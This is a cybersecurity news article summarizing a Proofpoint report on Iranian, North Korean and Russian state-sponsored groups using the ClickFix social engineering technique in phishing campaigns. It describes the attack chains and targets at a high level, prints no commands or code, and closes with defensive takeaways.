A growing number of state-sponsored hacking groups from Iran, North Korea, and Russia are exploiting a deceptive social engineering method known as ClickFix to deliver malware in highly targeted phishing campaigns. These attacks have been actively observed between late 2024 and early 2025, according to a detailed report from cybersecurity firm Proofpoint.
🎯 Who’s Behind the Attacks?
The campaigns have been attributed to advanced persistent threat (APT) groups tracked as:
TA427 (Kimsuky) – North Korea
TA450 (MuddyWater) – Iran
TA422 (APT28) – Russia
UNK_RemoteRogue – Suspected Russian APT
While ClickFix has traditionally been linked to cybercriminals, its proven success has led to adoption by nation-state actors, reshaping the threat landscape.
🔍 What is ClickFix?
ClickFix is a cunning social engineering technique that tricks victims into infecting their own systems by copying and executing malicious commands. Attackers often disguise the commands as solutions for:
CAPTCHA verifications
Device registration
This strategy replaces traditional malware delivery methods with self-executed infections, making it harder to detect and block.
🧪 Campaign Breakdown: TA427 (Kimsuky)
Initial Access: Spoofed meeting requests targeting individuals working on North Korean policy.
Tactic: A convincing conversation leads the victim to a malicious site, prompting them to run a PowerShell command.
Payload: Quasar RAT – an open-source remote access trojan.
Deception: Victims were misled by emails impersonating Japanese diplomats. Clicking a link opened a fake Japanese Embassy website that required device registration via PowerShell, ultimately triggering a malware chain.
🔁 Attack Chain Summary:
Phishing email with PDF lure
Fake embassy landing page
PowerShell command disguised as a fix
Scheduled Visual Basic script
Quasar RAT deployed and executed
🛠️ TA450 (MuddyWater) Uses ClickFix to Deploy Legitimate Tools
Timeline: November 13–14, 2024
Lure: Emails disguised as Microsoft security patches coinciding with Patch Tuesday.
Execution:
Users were instructed to run PowerShell with admin privileges.
A malicious script installed Level, a legitimate Remote Monitoring and Management (RMM) tool.
Attackers used this tool for espionage and data theft.
Targets:
Sectors: Finance, government, healthcare, education, transportation
Regions: Middle East (UAE, Saudi Arabia), North America (US, Canada), and parts of Europe (Germany, Switzerland)
🧨 UNK_RemoteRogue and Russian Espionage Operations
A suspected Russian APT, dubbed UNK_RemoteRogue, was observed leveraging ClickFix in phishing emails sent from compromised Zimbra servers. These emails contained links to weaponized Office documents.
Highlights:
Instructions embedded in the malicious page directed users to copy PowerShell code.
A tutorial video enhanced the believability.
Scripts launched commands linked to the Empire C2 framework.
Targets included employees at two defense contractors linked to arms manufacturing.
Ties to Ukraine: The campaign infrastructure overlapped with attacks targeting defense and aerospace firms tied to the Russia-Ukraine conflict, aiming to steal webmail credentials via spoofed login portals.
📊 Why ClickFix Is Gaining Traction Among APTs
According to Proofpoint:
Despite its sporadic use, ClickFix has now become a tactical favorite among state-sponsored threat actors from North Korea, Iran, and Russia. Its stealth and simplicity make it an ideal choice for socially engineered cyber attacks.
🧠 Key Takeaways for Cybersecurity Professionals
ClickFix is no longer a cybercrime-only tactic — nation-state actors are embracing it.
PowerShell abuse remains a top concern, particularly when users are socially manipulated into self-compromise.
Critical sectors across the globe—from defense to healthcare—are now targets.
Ongoing vigilance, email filtering, and employee training are essential to mitigate the threat.
🔐 Stay Informed, Stay Secure
The evolution of ClickFix from cybercrime circles to nation-state malware campaigns marks a new chapter in the threat landscape. As attackers grow more sophisticated, awareness and proactive defense remain our best tools.
